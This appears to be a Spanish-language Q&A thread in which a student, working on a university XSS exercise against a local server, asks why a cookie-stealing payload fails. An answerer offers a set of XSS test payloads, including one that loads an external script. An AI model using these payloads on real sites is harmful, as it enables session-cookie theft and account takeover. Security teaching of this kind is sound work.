Tengo un problema con la obtención de la cookie de sesión. Traté de reescribir el nombre de URL de este http://127.0.0.1:55555 to this http://127.0.0.1:55555/?p=<script>document.write('<img src=http://127.0.0.1:55555/?c='document.cookie+'/>');</script> pero no puedo obtener las cookies de sesión.
Este es un trabajo de proyecto en la universidad, y el profesor hizo dos preguntas al respecto, para ayudarnos a saber qué tiene de malo.
Todavía no entiendo cómo debo reescribir la URL.
Así es como se ve toda la página:
Y este es el enlace donde está el archivo ZIP: https://drive.google.com/file/d/18VyalmoQdiZ0lKhvEGazfiXSwoLKgp_8/view?usp=sharing
Múltiples cosas podrían estar en juego. Sin tener suficientes detalles y ningún código fuente para trabajar en su pregunta, diría que preste atención a:
?p= es difícil de determinar. Es posible que necesitemos ver el código fuente completo de la página.Para probar si el objetivo es realmente vulnerable a XSS, eche un vistazo a algunas de las cargas útiles de XSS a continuación. Son simples, por lo que si realmente hay XSS, es posible que tenga éxito.
https://github.com/payloadbox/xss-payload-list
Algunos ejemplos de buenas cargas útiles XSS para probar:
<script\x20type="text/javascript">javascript:alert(1);</script> <script>javascript:alert(1)</script\x0D <svg><x><script>alert(1)</x> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <BODY ONLOAD=alert('XSS')>Puedes probar cada uno reemplazando el tuyo, así:
http://127.0.0.1:55555/?p=<BODY ONLOAD=alert('XSS')>Si alguno de estos funciona, significa que tiene un campo vulnerable XSS y hay algún problema con su código XSS si no recupera la cookie.
Desafortunadamente, no puedo ayudar más hasta que deje más claro cuál es su objetivo y tal vez publique el código fuente del sitio web en cuestión.